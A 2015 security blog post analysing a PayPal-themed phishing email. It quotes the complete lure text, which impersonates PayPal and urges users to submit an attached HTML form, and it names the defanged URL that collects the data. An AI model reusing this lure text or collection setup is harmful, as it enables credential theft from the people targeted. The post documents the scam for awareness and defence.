A classical phishing email… Nothing special (same bad English, as always).
Dear Valued Customer,
Unauthorized access has been detected in your account.
Unfortunately, due to this event, our security system has limited the access to your account.
Account Limitations prevent you from completing certain actions with your account, such as withdrawing, sending, or receiving money.
These limitations are implemented when we see unusual or suspicious activity to help protect both PayPal buyers and sellers.Please verify your account by completing the form which is attached in this email. By doing this, restrictions in your account will be lifted.
We apologize for any inconve nience.
Thank you,
PayPal Security Team
What is interesting is the usage of a technique which I haven’t seen used since a couple of years: they attached an HTML document containing the form below.
The document is called “form.html” and it contains just one single javascript function used to validate the input.
It is a simple HTML form which submits to hxxp://www.secured-line.su/x01.php using a hidden ID.
Are they counting which form performs better ? Hmm…
Fortunately, Google detects these emails as spam/phishing and blocks them.
For additional tips on how to improve your security, check by eBook here: http://www.improve-your-security.org
© Copyright 2015 Sorin Mustaca, All rights Reserved. Written For: Sorin Mustaca on Cybersecurity
Check www.endpoint-cybersecurity.com for seeing the consulting services we offer.
Visit www.itsecuritynews.info for latest security news in English
Besuchen Sie de.itsecuritynews.info für IT Sicherheits News auf Deutsch
